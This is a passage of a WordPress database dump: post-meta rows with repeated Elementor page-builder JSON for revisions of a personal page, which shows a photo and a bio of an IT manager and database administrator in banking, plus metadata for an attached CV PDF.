cd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4023,796,'_wp_page_template','default'),
(4024,796,'_elementor_edit_mode','builder'),
(4025,796,'_elementor_template_type','wp-page'),
(4026,796,'_elementor_version','3.20.4'),
(4027,796,'_elementor_pro_version','3.13.2'),
(4028,796,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"groove\",\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4031,797,'_wp_page_template','default'),
(4032,797,'_elementor_edit_mode','builder'),
(4033,797,'_elementor_template_type','wp-page'),
(4034,797,'_elementor_version','3.20.4'),
(4035,797,'_elementor_pro_version','3.13.2'),
(4036,797,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4040,798,'_wp_page_template','default'),
(4041,798,'_elementor_edit_mode','builder'),
(4042,798,'_elementor_template_type','wp-page'),
(4043,798,'_elementor_version','3.20.4'),
(4044,798,'_elementor_pro_version','3.13.2'),
(4045,798,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4048,799,'_wp_page_template','default'),
(4049,799,'_elementor_edit_mode','builder'),
(4050,799,'_elementor_template_type','wp-page'),
(4051,799,'_elementor_version','3.20.4'),
(4052,799,'_elementor_pro_version','3.13.2'),
(4053,799,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4056,800,'_wp_page_template','default'),
(4057,800,'_elementor_edit_mode','builder'),
(4058,800,'_elementor_template_type','wp-page'),
(4059,800,'_elementor_version','3.20.4'),
(4060,800,'_elementor_pro_version','3.13.2'),
(4061,800,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4065,801,'_wp_page_template','default'),
(4066,801,'_elementor_edit_mode','builder'),
(4067,801,'_elementor_template_type','wp-page'),
(4068,801,'_elementor_version','3.20.4'),
(4069,801,'_elementor_pro_version','3.13.2'),
(4070,801,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4073,802,'_wp_page_template','default'),
(4074,802,'_elementor_edit_mode','builder'),
(4075,802,'_elementor_template_type','wp-page'),
(4076,802,'_elementor_version','3.20.4'),
(4077,802,'_elementor_pro_version','3.13.2'),
(4078,802,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4081,803,'_wp_page_template','default'),
(4082,803,'_elementor_edit_mode','builder'),
(4083,803,'_elementor_template_type','wp-page'),
(4084,803,'_elementor_version','3.20.4'),
(4085,803,'_elementor_pro_version','3.13.2'),
(4086,803,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"dotted\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4089,804,'_wp_attached_file','2024/04/CV-DBA.pdf'),
(4090,804,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:14:\"CV-DBA-pdf.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:1408;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:304057;}s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"CV-DBA-pdf-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24579;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"CV-DBA-pdf-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:203798;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"CV-DBA-pdf-116x150.jpg\";s:5:\"width\";i:116;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7634;}}s:8:\"filesize\";i:266795;}'),
(4092,805,'_wp_page_template','default'),
(4093,805,'_elementor_edit_mode','builder'),
(4094,805,'_elementor_template_type','wp-page'),
(4095,805,'_elementor_version','3.20.4'),
(4096,805,'_elementor_pro_version','3.13.2'),
(4097,805,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"dotted\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4100,806,'_wp_page_template','default'),
(4101,806,'_elementor_edit_mode','builder'),
(4102,806,'_elementor_template_type','wp-page'),
(4103,806,'_elementor_version','3.20.4'),
(4104,806,'_elementor_pro_version','3.13.2'),
(4105,806,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"dotted\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph --><!-- wp:paragraph -->\\n<p>\\u00a0<\\/p>\\n<!-- \\/wp:paragraph -->\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"6bd211a0\",\"elType\":\"container\",\"settings\":[],\"elements\":[],\"isInner\":false}]'),
(4108,807,'_wp_page_template','default'),
(4109,807,'_elementor_edit_mode','builder'),
(4110,807,'_elementor_template_type','wp-page'),
(4111,807,'_elementor_version','3.20.4'),
(4112,807,'_elementor_pro_version','3.13.2'),
(4113,807,'_elementor_data','[{\"id\":\"52462b9\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\"}},\"elements\":[{\"id\":\"21b8beb\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"66dbece\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2024\\/04\\/HIXQ6420.jpg\",\"id\":791,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"dotted\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true},\"__globals__\":{\"image_border_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"fc57f11\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":\"50\"}},\"elements\":[{\"id\":\"14ec0ecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<!-- wp:paragraph -->\\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an 